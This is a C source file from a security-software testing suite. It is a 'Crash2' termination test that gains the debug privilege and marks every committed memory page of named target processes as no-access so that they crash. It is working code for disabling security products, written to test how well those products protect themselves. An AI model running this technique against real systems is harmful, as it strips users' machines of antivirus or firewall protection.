/*

 Security Software Testing Suite - Crash2 (termination test)
 Copyright by www.matousec.com, Different Internet Experience Ltd.
 http://www.matousec.com/


 Credits:

   * A similar technique is used by Advanced Process Termination - Crash 1, written by Diamond Computer Systems,
     formerly (http://www.diamondcs.com.au/).

   * A similar technique is also used by Simple Process Termination - Method 5, written by System Safety Limited.


 Method description:

   * Obtain the Debug privilege.

   * Open the target process and use VirtalProtectEx API to change the page protection of all memory pages
     in the target process to PAGE_NOACCESS.

   * This test works with a list of processes and reports success if at least one process was terminated.


 Known issues and warnings:

   * After each termination attempt, this test waits for a while to give the target process a chance to terminate.
     During this time no new process should be started, otherwise there is a chance to receive false negative results.

*/

#include <stdio.h>
#include <windows.h>
#include "include/common.h"
#include "include/common-hook.h"


int main(int argc,char **argv)
{
  int res=FALSE;

  COM_ERROR err_inf;
  err_inf.occurred=FALSE;

  COM_CONF conf;
  if (!com_console_init_main("Crash2","crash2",argc,argv,&conf,COM_TEST_TYPE_CRASH2)) return 1;

  char *used_dlls[]={"ntdll.dll","kernel32.dll","advapi32.dll"};
  if (!com_hook_load_libraries(used_dlls,3)) return 1;

  if (!com_privilege_enable_debug(&err_inf))
    com_err_print_clear(&err_inf,COM_ERR_STANDARD_PREFIX);


  ULONG pids[conf.processes_cnt];
  int ret=com_proc_get_pids_from_names(conf.processes,pids,conf.processes_cnt,&err_inf);
  if (ret)
  {
    for (int i=0;i<conf.processes_cnt;i++)
    {
      ULONG pid=pids[i];

      if (pid!=COM_CID_INVALID)
      {
        if (com_verbosity_get()) printf("Process \"%s\" found with PID %ld.\n",conf.processes[i],pid);

        HANDLE proc=NULL;
        if (com_process_open(pid,PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | SYNCHRONIZE,TRUE,TRUE,&proc,&err_inf))
        {
          void* addr=NULL;
          // the loop ends when we are out of user mode pages or if VirtualQueryEx fails
          while ((size_t)addr<0xC0000000)
          {
            MEMORY_BASIC_INFORMATION mbi;
            size_t qres=VirtualQueryEx(proc,addr,&mbi,sizeof(mbi));
            if (qres)
            {
              if (mbi.State==MEM_COMMIT)
              {
                DWORD old_protect;
                VirtualProtectEx(proc,mbi.BaseAddress,mbi.RegionSize,PAGE_NOACCESS,&old_protect);
              }

              addr=(void*)((size_t)mbi.BaseAddress+mbi.RegionSize);
            } else break;
          }

          CloseHandle(proc);
        } else com_err_print_clear(&err_inf,COM_ERR_STANDARD_PREFIX);

        if (com_verbosity_get()) printf("\n");
      } else if (ret) fprintf(stderr,"ERROR: Unable to find process \"%s\".\n\n",conf.processes[i]);
    }

    printf("Try to work with the target processes in next 20 seconds to crash them.\n\n");
    Sleep(20000);

    res=com_proc_termination_report(conf.processes,pids,conf.processes_cnt,&err_inf);
  }

  return com_end(res,&err_inf,&conf);
}
